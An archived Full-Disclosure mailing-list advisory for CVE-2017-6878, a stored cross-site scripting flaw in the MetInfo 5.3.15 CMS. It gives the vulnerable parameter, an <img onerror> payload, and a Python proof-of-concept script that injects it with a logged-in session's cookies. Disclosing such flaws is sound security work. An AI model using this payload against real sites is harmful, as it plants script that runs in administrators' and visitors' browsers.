lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <5fb9fe09.b91f.15add2d7bd8.Coremail.callarice@163.com>
Date: Sat, 18 Mar 2017 00:50:29 +0800 (CST)
From: 陈彦羽 <callarice@....com>
To: fulldisclosure@...lists.org
Subject: [FD] [CVE-2017-6878]:MetInfo5.3.15 Stored Cross Site Scripting

Hello:
The following is my application vulnerabilities.
---------------------------------------
---------------------------------------
[CVE-2017-6878]:MetInfo5.3.15 Stored Cross Site Scripting
Application: MetInfo
Versions Affected: 5.3.15
Vendor URL: http://www.metinfo.cn/
Software Link:http://www.metinfo.cn/upload/file/MetInfo5.3.zip
Bugs: Stored XSS
Author:Arice.chen(DBAPPSecurity Ltd)
Description:
MetInfo was established in March 2009, is a enterprise CMS, more than 40 m enterprises in the use of MeInfo build their own enterprise website.


Vulnerability details:
To modify, add a message in problem position insert JavaScript test code <img src=x onerror=alert(1)>
Then the background access to relevant pages, or other users access to the front desk page will make the attack code is executed.
---------------------------------------------
E-mail:callarice@....com
DBAppSecurity Ltd
www.dbappsecurity.com.cn


POC:
import requests
url = "http://192.168.0.28/MetInfo5.3/admin/column/delete.php?anyid=25&lang=cn&ajaxmetinfo=1&no_order_2=1&name_2=1<img src=x onerror=alert(2)>&nav_2=1&index_num_2=0&action=editor&lang=cn&anyid=25&allid=2,"
headers = {
     "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
 }
cookies = dict(PHPSESSID="9o2pth5a43hpj23nflnc7lfi24",
  recordurl="",
  met_auth="dfc7PoNLWryZ6Bu2hOEqxsEzRwMf3Nc%2BYqOWCxrSuQ2SivQF%2Fwfo0OP4JEP%2F7QakKJaXa46h5BB3nqrtt58caQaJcQ",
  met_key="pnZh0Fw",
  langset="cn",
  upgraderemind="1",
  tablepage_json="0%7Cuser%2Cadmin_user%2Cdojson_user_list"
  )
s = requests.get(url,cookies=cookies,headers=headers,timeout=10,verify=False)
if s.status_code==200:
  print 'Success'


Use this POC needs to obtain the cookie after login, because insert JavaScript place in the background.
The problem find is delete.php?name_2=
payload is :<img src=x onerror=alert(2)>


If after the success of the insert JavaScript, to several places in the background and other users access to the front desk page to attack code execution


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists